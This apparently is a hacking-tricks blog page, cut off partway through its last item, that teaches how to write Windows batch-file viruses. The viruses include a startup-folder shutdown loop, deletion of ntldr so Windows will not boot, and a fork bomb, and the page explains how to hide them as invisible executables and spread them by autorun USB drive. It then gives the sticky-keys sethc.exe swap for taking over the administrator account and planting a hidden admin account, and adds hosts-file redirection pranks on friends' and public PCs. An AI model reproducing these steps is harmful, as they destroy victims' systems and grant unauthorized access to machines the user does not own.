How to create Batch file viruses?

What are Batch Files ?

According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,


Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'

We first make a folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat



Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files, format data, steal information,consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes,

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.

:x
start cmd.exe
goto x // infinite loop

This code will be opening command prompt screen infinite times , irritating victim and affecting performance.

2.  copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts .


Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

3. Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.



Lets make a batch file to  delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del C:\ntldr //delete ntldr file

After ruuning this batch file , system will not reboot and a normal victim would definitely install the windows again.



4.%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows This is actually known as 'fork bomb'.

The viruses we just coded -:

 

Note : Most of the batch viruses are simply undetectable by any anitiviruses
 
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.

Download this Batch To Exe coverter from here.
http://www.mediafire.com/?uhsc5tfkd5dbn65
 
After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1. 
 
Open notepad and write

[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Hack administrator password through guest login

Learn to hack administrators password through guest login
Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s PC to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on...

Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites
Guest account with write access to system 32.




Method 1 (Change Admin Password)

Here is how to do that -

1.Go to C:/windows/system32

2.Copy cmd.exe and paste it on desktop

3.Rename cmd.exe to sethc.exe

4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5.Now Log out from your guest account and at the user select window,press shift key 5 times.

6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

7.Now type “ NET USER ADMINISTRATOR aaa" where “aaa" can be any password you like and press enter.

8.You will see “ The Command completed successfully" and then exit the command prompt and login into
administrator with your new password.

9.Congrats You have hacked admin through guest account.

Method 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing “NET USER How to hack /ADD" where "How to hack" is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Here create a new "DWORD value", write its name as the “How to hack" (the username that you entered in the previous step),now you can live with your admin account forever :)

Note:For the ones that are having problems with step one: What I would do because you do not have write access to the directory you can use a live version of Linux. Copy the cmd.exe to a flash drive. Boot into Linux and copy the cmd.exe to the file that needs to be replaced. In Linux you can bypass those read/write permissions.

Trick your webpage

A simple text file edit makes sites redirect to another. When you type
address in address bar in any browser and enter it then it will display
another web page, for example:- when you type Google.com you will be
redirected to yahoo.com

Instructions to do:

1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation
2) then hit enter
3) find a file named "hosts"
4) Right click on it and open with word pad.
5) In the last link of the document type the IP* address of yahoo space www.Google.com (Vice versa for other sites)
6) now save it
7) restart the browser if its already running
8) Now try it, It works perfect

IP*:
to find IP address of that website Goto start ->Run > type cmd
> enter. Now you have a new window on desktop. On that type this
without cotes "ping www. yahoo.com"
replace yahoo.com with your preferred site and then enter it
Recover Option: Repeat the first four steps and remove the last line
that you have inserted and save it and restart browser. Now its back to
normal
try this on your frieds pc and public pc and make them blink

Block website in your PC (Desktop or Laptop Computers)

Hello Friends,Sometimes you want to block some websites in your PC which are harmful for your computer,Now you can easily and effectively block access to a website by adding it to your Windows HOSTS file. (Yes, Hosts is capitalized for some strange reason).It is very easy in Use and it is working effectively,below is the trick that how can you Block a website in your PC.

1.Go to your HOSTS file which is located at:
C:\WINDOWS\SYSTEM32\DRIVERS\ETC for windows Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Windows 2k
C:\WINDOWS for Windows 98 and ME

2. Open HOSTS with Notepad